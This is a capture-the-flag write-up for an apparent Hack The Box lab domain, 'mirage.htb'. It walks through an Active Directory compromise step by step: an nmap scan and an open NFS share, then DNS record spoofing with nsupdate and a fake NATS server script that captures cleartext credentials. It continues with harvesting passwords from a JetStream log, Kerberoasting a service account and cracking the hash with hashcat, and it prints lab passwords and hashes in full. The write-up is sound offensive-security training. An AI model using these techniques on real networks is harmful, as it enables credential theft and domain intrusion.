Nmap
# Nmap 7.95 scan initiated Sun Jul 20 14:13:05 2025 as: /usr/lib/nmap/nmap --privileged -sC -sV -Pn -oN ./nmap.txt 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.43s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-20 11:19:33Z)
111/tcp open rpcbind?
|_rpcinfo: ERROR: Script execution failed (use -d to debug)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
2049/tcp open mountd 1-3 (RPC #100005)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after: 2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
50300/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-07-20T11:20:47
|_ start_date: N/A
|_clock-skew: -2h59m07s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 20 14:21:32 2025 -- 1 IP address (1 host up) scanned in 506.85 seconds
Add dc01.mirage.htb and mirage.htb to our/etc/hosts
NFS service
Firstly, we don't have any default credentials, but we see that the NFS service is enabled.
2049/tcp open mountd 1-3 (RPC #100005)
┌──(kali㉿kali)-[~]
└─$ showmount -e 10.10.11.78
Export list for 10.10.11.78:
/MirageReports (everyone)
So let's mount it to our local machine and check what things in that
┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/mirage
┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 10.10.11.78:/MirageReports /tmp/mirage
Then we can check it and we found there are 2 pdf files
┌──(root㉿kali)-[/tmp/mirage]
└─# ls
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf
Incident_Report_Missing_DNS_Record_nats-svc.pdf
Mirage_Authentication_Hardening_Report.pdf
To summarize more concisely:
- Abandon
NTLMauthentication and switch to aKerberos-onlyauthentication mode - Create a
dnsentry fornats-svc.mirage.htband use aresponderto obtain authentication
So let's modify our /etc/krb5.conf file firstly
[libdefaults]
dns_lookup_kdc = false
dns_lookup_realm = false
default_realm = MIRAGE.HTB
[realms]
MIRAGE.HTB = {
kdc = dc01.MIRAGE.HTB
admin_server = dc01.MIRAGE.HTB
default_domain = MIRAGE.HTB
}
[domain_realm]
.MIRAGE.HTB = MIRAGE.HTB
MIRAGE.HTB = MIRAGE.HTB
Then let's make a fake nats-server and use nsupdate to send the update message
fake_server.py
import socket
print("[+] Fake NATS Server listening on 0.0.0.0:4222")
s = socket.socket()
s.bind(("0.0.0.0", 4222))
s.listen(5)
while True:
client, addr = s.accept()
print(f"[+] Connection from {addr}")
# Send fake INFO (obligatoire pour handshake NATS)
client.sendall(b'INFO {"server_id":"FAKE","version":"2.11.0","auth_required":true}\r\n')
data = client.recv(1024)
print("[>] Received:")
print(data.decode())
# Optional: respond with -ERR or close connection
client.close()
Then run the script and send the update message
┌──(kali㉿kali)-[~]
└─$ nsupdate
> server 10.10.11.78
> update add nats-svc.mirage.htb 3600 A 10.10.14.13
> send
┌──(kali㉿kali)-[~]
└─$ python3 script.py
[+] Fake NATS Server listening on 0.0.0.0:4222
[+] Connection from ('10.10.11.78', 64823)
[>] Received:
CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"hx5h7F5554fP@1337!","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":false,"no_responders":false}
We successfully get one of credit Dev_Account_A:hx5h7F5554fP@1337!
Then we can use natscli to interact with this credit
https://github.com/nats-io
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats context add dev-nats \
--server nats://dc01.mirage.htb:4222 \
--user Dev_Account_A \
--password 'hx5h7F5554fP@1337!' \
--description "Dev access"
NATS Configuration Context "dev-nats"
Description: Dev access
Server URLs: nats://dc01.mirage.htb:4222
Username: Dev_Account_A
Password: ******************
Path: /home/kali/.config/nats/context/dev-nats.json
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats sub ">" --count 10
15:09:34 Subscribing on >
[#1] Received on "$JS.API.STREAM.INFO.auth_logs" with reply "_INBOX.hiC9z2e0Xl3baBFA1YaO99.qt7mNM4b"
nil body
[#2] Received on "_INBOX.hiC9z2e0Xl3baBFA1YaO99.qt7mNM4b"
{"type":"io.nats.jetstream.api.v1.stream_info_response","total":0,"offset":0,"limit":0,"config":{"name":"auth_logs","subjects":["logs.auth"],"retention":"limits","max_consumers":-1,"max_msgs":100,"max_bytes":1048576,"max_age":0,"max_msgs_per_subject":-1,"max_msg_size":-1,"discard":"new","storage":"file","num_replicas":1,"duplicate_window":120000000000,"compression":"none","allow_direct":true,"mirror_direct":false,"sealed":false,"deny_delete":true,"deny_purge":true,"allow_rollup_hdrs":false,"consumer_limits":{},"allow_msg_ttl":false,"metadata":{"_nats.level":"1","_nats.req.level":"0","_nats.ver":"2.11.3"}},"created":"2025-05-05T07:18:19.6244845Z","state":{"messages":5,"bytes":570,"first_seq":1,"first_ts":"2025-05-05T07:18:56.6788658Z","last_seq":5,"last_ts":"2025-05-05T07:19:27.2106658Z","num_subjects":1,"consumer_count":1},"cluster":{"leader":"NAH4LAMD6PTGJ622LMXC35RRBIW6L3YW2DLVYFWUVXRB6YWONH2GZIME"},"ts":"2025-07-20T12:16:01.5155287Z"}
[#3] Received on "$JS.EVENT.ADVISORY.API"
{"type":"io.nats.jetstream.advisory.v1.api_audit","id":"jCTLkyff7JDePSU8JUlfwv","timestamp":"2025-07-20T12:16:01.5155287Z","server":"NAH4LAMD6PTGJ622LMXC35RRBIW6L3YW2DLVYFWUVXRB6YWONH2GZIME","client":{"start":"2025-07-20T05:16:01.5144746-07:00","host":"dead:beef::d697:5c15:ad98:6a7b","id":743,"acc":"dev","user":"Dev_Account_A","name":"NATS CLI Version 0.2.2","lang":"go","ver":"1.41.1","rtt":524100,"server":"NAH4LAMD6PTGJ622LMXC35RRBIW6L3YW2DLVYFWUVXRB6YWONH2GZIME","kind":"Client","client_type":"nats"},"subject":"$JS.API.STREAM.INFO.auth_logs","response":"{\"type\":\"io.nats.jetstream.api.v1.stream_info_response\",\"total\":0,\"offset\":0,\"limit\":0,\"config\":{\"name\":\"auth_logs\",\"subjects\":[\"logs.auth\"],\"retention\":\"limits\",\"max_consumers\":-1,\"max_msgs\":100,\"max_bytes\":1048576,\"max_age\":0,\"max_msgs_per_subject\":-1,\"max_msg_size\":-1,\"discard\":\"new\",\"storage\":\"file\",\"num_replicas\":1,\"duplicate_window\":120000000000,\"compression\":\"none\",\"allow_direct\":true,\"mirror_direct\":false,\"sealed\":false,\"deny_delete\":true,\"deny_purge\":true,\"allow_rollup_hdrs\":false,\"consumer_limits\":{},\"allow_msg_ttl\":false,\"metadata\":{\"_nats.level\":\"1\",\"_nats.req.level\":\"0\",\"_nats.ver\":\"2.11.3\"}},\"created\":\"2025-05-05T07:18:19.6244845Z\",\"state\":{\"messages\":5,\"bytes\":570,\"first_seq\":1,\"first_ts\":\"2025-05-05T07:18:56.6788658Z\",\"last_seq\":5,\"last_ts\":\"2025-05-05T07:19:27.2106658Z\",\"num_subjects\":1,\"consumer_count\":1},\"cluster\":{\"leader\":\"NAH4LAMD6PTGJ622LMXC35RRBIW6L3YW2DLVYFWUVXRB6YWONH2GZIME\"},\"ts\":\"2025-07-20T12:16:01.5155287Z\"}"}
We successfully get connect to NATs service here.
Now we should focus on the auth_logs stream and get historical messages through the JetStream consumer next command.
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer add auth_logs audit-reader --pull --ack=explicit
[dev-nats] ? Start policy (all, new, last, subject, 1h, msg sequence) all
[dev-nats] ? Replay policy instant
[dev-nats] ? Filter Stream by subjects (blank for all) logs.auth
[dev-nats] ? Maximum Allowed Deliveries 1
[dev-nats] ? Maximum Acknowledgments Pending 5
[dev-nats] ? Deliver headers only without bodies No
[dev-nats] ? Add a Retry Backoff Policy No
Information for Consumer auth_logs > audit-reader created 2025-07-20 12:26:56
Configuration:
Name: audit-reader
Pull Mode: true
Filter Subject: logs.auth
Deliver Policy: All
Ack Policy: Explicit
Ack Wait: 30.00s
Replay Policy: Instant
Maximum Deliveries: 1
Max Ack Pending: 5
Max Waiting Pulls: 512
State:
Host Version: 2.11.3
Required API Level: 0 hosted at level 1
Last Delivered Message: Consumer sequence: 0 Stream sequence: 0
Acknowledgment Floor: Consumer sequence: 0 Stream sequence: 0
Outstanding Acks: 0 out of maximum 5
Redelivered Messages: 0
Unprocessed Messages: 5
Waiting Pulls: 0 of maximum 512
Then let's pull the messages
┌──(kali㉿kali)-[~]
└─$ /opt/nats-0.2.4-linux-arm64/nats --context dev-nats consumer next auth_logs audit-reader --count=5 --wait=5s --ack
[15:20:12] subj: logs.auth / tries: 1 / cons seq: 1 / str seq: 1 / pending: 4
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message after 629.702564ms delay
[15:20:13] subj: logs.auth / tries: 1 / cons seq: 2 / str seq: 2 / pending: 3
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message after 358.081989ms delay
[15:20:14] subj: logs.auth / tries: 1 / cons seq: 3 / str seq: 3 / pending: 2
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message after 2.428837443s delay
[15:20:18] subj: logs.auth / tries: 1 / cons seq: 4 / str seq: 4 / pending: 1
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message after 549.003677ms delay
[15:20:19] subj: logs.auth / tries: 1 / cons seq: 5 / str seq: 5 / pending: 0
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
Acknowledged message after 3.238919648s delay
We successfully get another credential: david.jjackson:pN8kQmn6b86!1234@
Then let's check the credit
┌──(kali㉿kali)-[~]
└─$ sudo ntpdate dc01.mirage.htb
2025-07-20 12:30:51.216502 (+0000) -10324.444328 +/- 0.233875 dc01.mirage.htb 10.10.11.78 s1 no-leap
CLOCK: time stepped by -10324.444328
┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k
LDAP 10.10.11.78 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP 10.10.11.78 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
And also, we can enumerate the user lists
┌──(kali㉿kali)-[~]
└─$ nxc ldap 10.10.11.78 -u david.jjackson -p 'pN8kQmn6b86!1234@' -k --users
LDAP 10.10.11.78 389 DC01 [*] None (name:DC01) (domain:mirage.htb)
LDAP 10.10.11.78 389 DC01 [+] mirage.htb\david.jjackson:pN8kQmn6b86!1234@
LDAP 10.10.11.78 389 DC01 [*] Enumerated 10 domain users: mirage.htb
LDAP 10.10.11.78 389 DC01 -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.11.78 389 DC01 Administrator 2025-06-23 21:18:18 0 Built-in account for administering the computer/domain
LDAP 10.10.11.78 389 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.11.78 389 DC01 krbtgt 2025-05-01 07:42:23 0 Key Distribution Center Service Account
LDAP 10.10.11.78 389 DC01 Dev_Account_A 2025-05-27 14:05:12 0
LDAP 10.10.11.78 389 DC01 Dev_Account_B 2025-05-02 08:28:11 1
LDAP 10.10.11.78 389 DC01 david.jjackson 2025-05-02 08:29:50 0
LDAP 10.10.11.78 389 DC01 javier.mmarshall 2025-07-20 06:32:54 0 Contoso Contractors
LDAP 10.10.11.78 389 DC01 mark.bbond 2025-06-23 21:18:18 0
LDAP 10.10.11.78 389 DC01 nathan.aadam 2025-06-23 21:18:18 0
LDAP 10.10.11.78 389 DC01 svc_mirage 2025-05-22 20:37:45 0 Old service account migrated by contractors
Also we can bloodhound this user
┌──(kali㉿kali)-[~]
└─$ bloodhound-python -u david.jjackson -p 'pN8kQmn6b86!1234@' -k -d mirage.htb -ns 10.10.11.78 -c ALl --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: mirage.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.mirage.htb
INFO: Found 12 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 21 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.mirage.htb
INFO: Done in 01M 41S
INFO: Compressing output into 20250720123334_bloodhound.zip
Sibling Objects in the Same OU
We can try to use impacket-GetUserSPNs to get the krbs hash of Nathan
┌──(kali㉿kali)-[~]
└─$ impacket-GetUserSPNs 'mirage.htb/david.jjackson' -dc-host dc01.mirage.htb -k -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------ ------------ ------------------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/exchange.mirage.htb nathan.aadam CN=Exchange_Admins,OU=Groups,OU=Admins,OU=IT_Staff,DC=mirage,DC=htb 2025-06-23 21:18:18.584667 2025-07-20 06:49:05.069834
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$ff55629e4501a71bdc58d79922a17e7b$294d578fd6dbbf5ef7460cf79d59fae89a41394d4eb2cfafd109eb4f8265c188893dbd67013aeac6c81f6bbdc4bac89bd9a51a7fb3fa7e0844589e30947e754e47f178c25c34011f9ad0bebc7ca7f313abaf089eb6ac2ad21c08dcd7bbf182e58eda4b8d5e6246abd75da17d1f657c1e0febbf1ef6926039d943e079992c3a33b23c7750e0fa6cc15f3dd42515392efea5cb4e0ac3ef0de50f1c8d2a5f5649e58206abd2fda1b2ed8d572e775988eb03c5b389cc6733a59c47e0f3da4263fd62f2063b58949d74554e27bf83598328aa10cad8871fad67de0482a470be476aa218b29aa136cf4a6e69d1431eda13951da2cbced850b92e9246ad5f50c79c626cc224f0241069ed2f1867de070bc1be03c3d674f1cb135f25772f5a08f8d16fdeeed89411b4b92aa823dfce8bbcdb40277b04e36358867af8ab0dca01b528fcc0e8b7d4fd8494f6b8736f3be6cf675552e5ce86e89397cb0f82526e1f043fc26112ba75cd6fa1961be278f424069779146d2845f6c19f5be17818efe4f1dd0d21a26c8f5ab0db8feea7457b71ad1383b64c19fb27a758a3614ccfa064f0e1536390573df7e0daff8c91c29f9d057dd7afcbf95c2906de56400f73265b2d5ce007e92dddcdca2d01e7d5669799769a7c8343e88802c3fd030ae8e231a1b4cfa880d02140c7ecf374c9c4fae1f6f36208e67922a21ee920881b58c0d849d345be732a48a627876f1678485dc0781d5bc43214300fb8975a09e6d2a992e101f419f1c4564416a9ef66cc6216b5d5a7b0b7bf7e8a748d54e1ab23e003b58117e99d26358120275fb081a41eaf31053f6b11adbfc75cd57fe7cacf8f2d8989d9b2eb5ccc45905a3870633c8eaa83033d9b600d5ae12ee1e567940626de28bfe4bdaada5454fac321ac8be1b66c6aa9ed7c19efde0eb7c1a27ba9af5bcb19c1b3451c7bb5e0416c25b78969bb05af65866042807371d83b21f4f5e0dc6c2c07514093cf59fc5c657061867464c86b645eb8078b03189f20cf28c1485d98fb1766304d57ffca3c799146e93da0d42b5e50b14553ba6f72addf968b648a5dc661d8475630fccdedc57db5bb59ec96ecc1009bc80380ab7164d04bc02d145cf57da5eaf3af8ca52b63b31374352f3b81a977d7759d243ae777a970ca80592b1d123d1ca22e0b107f7353d6a9652bc6f06495e8efdfb4a5e35e0ba532c2373cc7c1f2d957ed7305c2d899c1b4c9893a523a83bfe89bfca709c30bdcaa1bd87763a218d5cc08ad24297c85e3b9cdf19135524050b28c4e56a1aec2457f483d4679d3c469c60803b2a315b1fc361e204432f4f338b21edffaeef9e269a77ce0f85e1ab9b3490db3e881e3f162202a5352d749dbd71dfd3c600afa5959da21089ae83c953cf33abf2e1d196c91ddc8816fba32432f78c7de45a95e2f704ccf0ff65bf0a5af112ed02c4f326ba37a8da6f13bdb5e0bc2f532ad3d9c15965070a7fd4fbeb27e91b23ed725a9cfa2140a004b1e83e19deef9776b5f4a4540fa15a5c1dd796b5a55365a51ef997ce9030a83810a2da70105b23fd1f1013454081faa
Then we can use hashcat to crack the password of nathan
┌──(kali㉿kali)-[~]
└─$ hashcat nathan.hash /usr/share/wordlists/rockyou.txt -m 13100 --show
$krb5tgs$23$*nathan.aadam$MIRAGE.HTB$mirage.htb/nathan.aadam*$ff55629e4501a71bdc58d79922a17e7b$294d578fd6dbbf5ef7460cf79d59fae89a41394d4eb2cfafd109eb4f8265c188893dbd67013aeac6c81f6bbdc4bac89bd9a51a7fb3fa7e0844589e30947e754e47f178c25c34011f9ad0bebc7ca7f313abaf089eb6ac2ad21c08dcd7bbf182e58eda4b8d5e6246abd75da17d1f657c1e0febbf1ef6926039d943e079992c3a33b23c7750e0fa6cc15f3dd42515392efea5cb4e0ac3ef0de50f1c8d2a5f5649e58206abd2fda1b2ed8d572e775988eb03c5b389cc6733a59c47e0f3da4263fd62f2063b58949d74554e27bf83598328aa10cad8871fad67de0482a470be476aa218b29aa136cf4a6e69d1431eda13951da2cbced850b92e9246ad5f50c79c626cc224f0241069ed2f1867de070bc1be03c3d674f1cb135f25772f5a08f8d16fdeeed89411b4b92aa823dfce8bbcdb40277b04e36358867af8ab0dca01b528fcc0e8b7d4fd8494f6b8736f3be6cf675552e5ce86e89397cb0f82526e1f043fc26112ba75cd6fa1961be278f424069779146d2845f6c19f5be17818efe4f1dd0d21a26c8f5ab0db8feea7457b71ad1383b64c19fb27a758a3614ccfa064f0e1536390573df7e0daff8c91c29f9d057dd7afcbf95c2906de56400f73265b2d5ce007e92dddcdca2d01e7d5669799769a7c8343e88802c3fd030ae8e231a1b4cfa880d02140c7ecf374c9c4fae1f6f36208e67922a21ee920881b58c0d849d345be732a48a627876f1678485dc0781d5bc43214300fb8975a09e6d2a992e101f419f1c4564416a9ef66cc6216b5d5a7b0b7bf7e8a748d54e1ab23e003b58117e99d26358120275fb081a41eaf31053f6b11adbfc75cd57fe7cacf8f2d8989d9b2eb5ccc45905a3870633c8eaa83033d9b600d5ae12ee1e567940626de28bfe4bdaada5454fac321ac8be1b66c6aa9ed7c19efde0eb7c1a27ba9af5bcb19c1b3451c7bb5e0416c25b78969bb05af65866042807371d83b21f4f5e0dc6c2c07514093cf59fc5c657061867464c86b645eb8078b03189f20cf28c1485d98fb1766304d57ffca3c799146e93da0d42b5e50b14553ba6f72addf968b648a5dc661d8475630fccdedc57db5bb59ec96ecc1009bc80380ab7164d04bc02d145cf57da5eaf3af8ca52b63b31374352f3b81a977d7759d243ae777a970ca80592b1d123d1ca22e0b107f7353d6a9652bc6f06495e8efdfb4a5e35e0ba532c2373cc7c1f2d957ed7305c2d899c1b4c9893a523a83bfe89bfca709c30bdcaa1bd87763a218d5cc08ad24297c85e3b9cdf19135524050b28c4e56a1aec2457f483d4679d3c469c60803b2a315b1fc361e204432f4f338b21edffaeef9e269a77ce0f85e1ab9b3490db3e881e3f162202a5352d749dbd71dfd3c600afa5959da21089ae83c953cf33abf2e1d196c91ddc8816fba32432f78c7de45a95e2f704ccf0ff65bf0a5af112ed02c4f326ba37a8da6f13bdb5e0bc2f532ad3d9c15965070a7fd4fbeb27e91b23ed725a9cfa2140a004b1e83e19deef9776b5f4a4540fa15a5c1dd796b5a55365a51ef997ce9030a83810a2da70105b23fd1f1013454081faa:3edc#EDC3